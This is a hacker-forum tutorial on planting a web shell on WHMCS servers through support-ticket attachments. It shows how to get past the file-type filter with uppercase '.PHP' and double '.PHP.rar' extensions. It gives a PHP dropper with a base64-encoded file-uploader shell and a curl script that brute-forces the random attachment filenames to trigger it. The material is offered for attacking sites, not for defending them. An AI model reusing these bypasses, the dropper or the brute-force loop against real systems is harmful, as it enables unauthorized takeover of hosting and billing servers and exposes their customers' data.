WHMCS Shell Uploading Tutorial

WHMCS Shell Uploading Tutorial

Credits: sec4ever, MadLeets and all Pakistani Haxors




 This Tutorial Is About Uploading Shell On WHMCS Via Attachments 

At First , Let's Talk About Mime Types

These Are Extensions 

Code:

gif,png,rar,zip,php,asp,aspx

Apache Uses Extension To Run File As It Extension

For Example If You Upload File As This : b0x.gif

Apache Will run it As Picture/Image

And If You Do it As This : b0x.php

The File will Be Run as PHP File 

Okay ... In Apache There Are Many Extensions Are Not Defined-ed Like rar

So Let's Start in WHMCS go to submit new ticket 

Code:

http://site.tld/whmcs/submitticket.php

You'll See This


So Here The Attachments We've Prospect'z 

I : The Extension PHP Is allowed To Be Uploaded 

But When We Try 2 Upload PHP File We'll Have This result 



To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This

Code:

b0x.PHP

The Changing In Extension Will Be Via Tamepr Data

 

Then Submit it



Our Ticket Is ready Now .. So We Uploaded PHP 

This Was Our 1st Prospect

II : PHP Extension Is not Allowed To Be uploaded on WHMCS 

So We'll Use Non-Defined Extension in Apache

Like " rar " So We'll Use Tamper Data Too 

 

We'll Upload As This "b0x.PHP.rar"

Don't Forget Capital Letters

Then We'll Have This



File Uploaded Successfully 

But In WHMCS ,, When You Use Attachment or upload One

The File Will Automatically Renamed To Be Like This

Code:

number_filename.extension

For Example Our File b0x.PHP Will Be Like This

Code:

RandomNumber_b0x.PHP

We'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers

Before That .. Let's Make Small Summery 

This Code Must be As Attach File

PHP Code:

<?php
$shellcode = "PD9waHANCmVjaG8gJzxiPjxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZv ​ cm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFt ​ ZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1l ​ PSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwi ​ IHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkg ​ ew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWydu ​ YW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2Ug ​eyBlY2hvICc8Yj5VcGxvYWQgR0FHQUwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="; $b0x = fopen("sec4ever.php","w"); fwrite($b0x,base64_decode($shellcode)); ?>

This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined

After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php

PHP Code:

<?
error_reporting(0);  $url = "http://domain.tld/whmcs/";  $attachfolder = "attachments";  $attach= "b0x.PHP";
for($b0x=100000; $b0x<1000000;$b0x++){  $urls = "$url/$attachfolder/$b0x"; $urls.="_$attach";  $ch = @curl_init();
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_URL, $urls );  $result = @curl_exec($ch);
@curl_close($ch);
}  ?>

 Edit The Variables To Get The Correct Result - 3xPecteD

Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function

The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number !

But The Script Will Generate Shell/Uploader in Sec4ever.php

WHMCS Shell Uploading Tutorial